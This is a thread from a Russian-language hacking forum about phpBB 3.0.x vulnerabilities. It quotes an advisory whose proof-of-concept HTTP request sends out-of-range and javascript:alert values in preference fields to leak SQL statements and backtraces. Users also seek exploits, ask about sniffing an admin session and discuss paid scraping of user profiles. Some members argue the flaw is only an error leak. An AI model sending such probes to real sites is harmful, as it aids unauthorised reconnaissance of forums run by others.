Форумы [Обзор уязвимостей phpBB]

Discussion in 'Уязвимости CMS/форумов' started by qBiN, 8 Jan 2006.

  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    какая именно ?
     
    _________________________
  2. phenix1025

    phenix1025 New Member

    Joined:
    20 Oct 2012
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    phpbb 3

    Подскажите, пожалуйста, есть ли что на phpbb v3 RC-5 ? Вроде версия выпущена довольно давно, но живого ничего на нее найти не могу :(
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Приложи PoC пожалуйста и уязвимый код.

    Народ недопонимает о чём речь.
     
    _________________________
  4. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Пробовал на 3.0.9 - при смене User-Agent - вылетает сессия. И все. Можно код?
     
  5. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    phpBB <= 3.0.11 file injection? 0_o

    /includes/acp/acp_language.php
    PHP:
    // Get target filename for storage folder
                    
    $filename $this->get_filename($row['lang_iso'], $this->language_directory$this->language_filetruetrue);
                    
    $fp = @fopen($phpbb_root_path $filename'wb');

                    if (!
    $fp)
                    {
                        
    trigger_error(sprintf($user->lang['UNABLE_TO_WRITE_FILE'], $filename) . adm_back_link($this->u_action '&amp;id=' $lang_id '&amp;action=details&amp;language_file=' urlencode($selected_lang_file)), E_USER_WARNING);
                    }

                    if (
    $this->language_directory == 'email')
                    {
                        
    // Email Template
                        
    $entry $this->prepare_lang_entry($_POST['entry'], false);
                        
    fwrite($fp$entry);
                    }
    $entry = $this->prepare_lang_entry($_POST['entry'], false);
    fwrite($fp, $entry);

    Подтолкните в верном направление
     
    #85 Pirotexnik, 12 Nov 2012
    Last edited: 12 Nov 2012
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862

    Чувствую себя попугаем. (Птицей, а не форумчанином =) )

    (Попугаю кстати отдельный привет =))

    Приложите наконец-то уязвимый код и PoC раз постите такие уязвимости.
     
    _________________________
    2 people like this.
  7. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    BigBear ты модератор раздела, ну проверь её сам, что ты просишь код у человека который пишет бред?

    Вот запрос о котором он тут пишет:

    includes/ucp/ucp_prefs.php

    PHP:
    'post_st'        => request_var('post_st', (!empty($user->data['user_post_show_days'])) ? $user->data['user_post_show_days'] : 0),
    ...
                            
    $sql 'UPDATE ' USERS_TABLE '
                                SET ' 
    $db->sql_build_array('UPDATE'$sql_ary) . '
                                WHERE user_id = ' 
    $user->data['user_id'];
                            
    $db->sql_query($sql);
    includes/functions.php
    PHP:
    function request_var($var_name$default$multibyte false$cookie false)
    ...
        if (!
    is_array($default))
        {
            
    $type gettype($default);
        }
    тип переменной определяется из $user->data, который выбирается из phpbb_users, а там в свою очередь стоит:
    Code:
    user_post_show_days 	smallint(4) 		UNSIGNED
    какая на*** скуля, накачали акунетиксов и стали хакерами.
     
    3 people like this.
  8. BaleHoK

    BaleHoK Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    399
    Likes Received:
    21
    Reputations:
    10


    Он просто не правильно выразился (мб просто знаний не хватает в данной области), там не sql inj а просто sql error,так же эррор валится и в topic_st=-1

    Но еще раз повторю,не скул это,просто эрроры
     
  9. CoBecTb

    CoBecTb New Member

    Joined:
    12 Aug 2012
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Посоветуйте хороший снифер, и ещё вопрос, смогу ли я таким образом угнать админку? Заранее благодарю.
     
  10. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    2CoBecTb Fiddler. Нет.
     
  11. Dr..VATSON

    Dr..VATSON Elder - Старейшина

    Joined:
    7 Dec 2008
    Messages:
    52
    Likes Received:
    53
    Reputations:
    18
    На 3.0.10 есть чего?
     
  12. FeoGrad

    FeoGrad New Member

    Joined:
    5 Mar 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Постоянно лезет массовый спам на форум (v. 3.0.11)

    То же началось ещё в весрии 3.0.9

    Обновил до v. 3.0.11 - всё тоже

    Сбэкапил БД уже обновлённого форума, снёс его полностью и поставил всё с самого нуля. Восстановил на полностью новом форуме старую БД. Ничего не дало - спамеры лезут.

    Вопрос/ответ - не помагает. ReCaptcha так же...

    Что можно сделать. Я не хакер, а просто вебмастер. Кто может помочь?
     
  13. ukrpunk

    ukrpunk Member

    Joined:
    31 Oct 2011
    Messages:
    47
    Likes Received:
    14
    Reputations:
    5
    сделай при регистрации чтобы кроме капчи вопрос был, только вопрос сам придумай чтобы его в базе хрумера не было
     
    1 person likes this.
  14. FeoGrad

    FeoGrad New Member

    Joined:
    5 Mar 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Я же писал, что вопрос-ответ уже пробовал. Одинаково спам идёт. Вопросы делал свои и неплохие...
     
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Заказать парсер профилей на заказ, либо при наличии доступа к БД вытягивать нужную колонку из таблицы с пользователями.

    Всю спарсенную информацию пропускать через регулярные выражения.
     
    _________________________
  16. neomag06

    neomag06 New Member

    Joined:
    18 Apr 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    BigBear, Спасибо большое за ответ!
    Доступ к форуму только пользовательский, соответственно залезть в БД не могу, поэтому этот вариант не подходит.
    А вот на заказ заказать - это выход. Я видел на этом форуме несколько таких предложений, но их авторы не отзываются, а их почты не работают...
    Может подскажете к кому обратиться или какую программу использовать для моей цели.
    Спасибо.
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Попробуйте написать тему здесь. Не забудьте про сумму оплаты.

    Ну и если хотите получить свой продукт в целостности и сохранности - советую пользоваться сервисом Гарантов Античата.
     
    _________________________
  18. AnnaKill

    AnnaKill New Member

    Joined:
    20 Jul 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Вот ваше спасение: http://www.phpbb.com/customise/db/mod/sortables_captcha_plugin/
    Спамеры всё-равно могут пройти, но уже только ручками. Робот такого не умеет. Проверено! :)
     
  19. KSIVIT

    KSIVIT New Member

    Joined:
    27 Sep 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -2
    Уважаемые, помогите пожалуйста с эксплуатированием этого эксплойта.


    ------------------------------------------------------------------
    Name : phpBB3 SQL Injection
    ------------------------------------------------------------------
    Date : 27.07.2012
    ------------------------------------------------------------------
    Site : www.phpbb.com
    ------------------------------------------------------------------
    Version : 3.0.10
    ------------------------------------------------------------------

    1) What is it?
    This is very nice forum board. You should try it!
    ------------------------------------------------------------------
    2) Type of bug?
    SQL Injection (or SQL-info-Leak if You want).
    ------------------------------------------------------------------
    3) Where is the bug?
    Vulnerable parameter seems to be 'style' because if we set up this parameter
    to 'bigger number' (for example: 111111111) we will get an error, with full SQL
    statement.

    *updated - dateformat is the second vulnerable parameter!
    *updated - post_st is the 3rd vulnerable parameter!
    *updated - another one: topic_st


    4) PoC traffic from Burp:
    4.1) Request :

    ---
    POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
    Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 258
    Connection: close

    viewemail=1
    &massemail=1
    &allowpm=1
    &hideonline=0
    &notifypm=1
    &popuppm=0
    &lang=en
    &style=%2b1111111111
    &tz=0
    &dst=0
    &dateoptions=D+M+d%2C+Y+g%3Ai+a
    &dateformat=D+M+d%2C+Y+g%3Ai+a
    &submit=Submit
    &creation_time=1343370877
    &form_token=576...

    ---

    4.2) Response:

    ---
    HTTP/1.1 503 Service Unavailable
    Date: Fri, 27 Jul 2012 06:39:06 GMT
    Server: Apache/2.2.22 (Ubuntu)
    X-Powered-By: PHP/5.3.10-1ubuntu3.2
    Vary: Accept-Encoding
    Connection: close
    Content-Type: text/html
    Content-Length: 2889


    <!DOCTYPE html PUBLIC "(...)

    <a href="./">Return to the index page</a> </div> <div id="acp"> <div class="panel">
    <div id="content">
    <h1>General Error</h1>
    <div>SQL ERROR [ mysqli ]<br /><br />Out of range value for column 'user_style' at row 1 [1264]<br />
    <br />SQL<br /><br />UPDATE phpbb_users
    SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
    user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
    user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
    WHERE user_id = 2<br />
    <br />BACKTRACE<br /><div style="font-family: monospace;"><br />
    <b>FILE:</b> [ROOT]/includes/db/mysqli.php<br />
    <b>LINE:</b> 182<br />
    <b>CALL:</b> dbal-&gt;sql_error()<br /><br />
    <b>FILE:</b> [ROOT]/includes/ucp/ucp_prefs.php
    <br /><b>LINE:</b> 100<br />
    <b>CALL:</b> dbal_mysqli-&gt;sql_query()<br /><br />
    <b>FILE:</b> [ROOT]/includes/functions_module.php<br />
    <b>LINE:</b> 507<br />
    <b>CALL:</b> ucp_prefs-&gt;main()<br />
    <br /><b>FILE:</b> [ROOT]/ucp.php<br />
    <b>LINE:</b> 333<br />
    <b>CALL:</b> p_master-&gt;load_active()<br />
    </div><br /></div>
    <p>Please notify the board administrator or webmaster: (...)

    ---


    4.2 Other response (this time from post_st parameter):
    ---
    </style></head><body id="errorpage"><div id="wrap">
    <div id="page-header">
    <a href="./">Return to the index page</a>
    </div> <div id="acp"> <div class="panel">
    <div id="content">
    <h1>General Error</h1>
    <div>SQL ERROR [ mysqli ]<br /><br />
    Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]
    <br /><br />An SQL error occurred while fetching this page.
    Please contact the <a href="(...)
    ---

    5) More?

    - Ethical hacking for Your company:
    http://hauntit.blogspot.com

    - Burp Proxy:
    http://www.portswigger.org

    - phBB3 Download:
    http://www.phpbb.com
     
  20. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    ага, тоже от сплойта выше, как его юзать)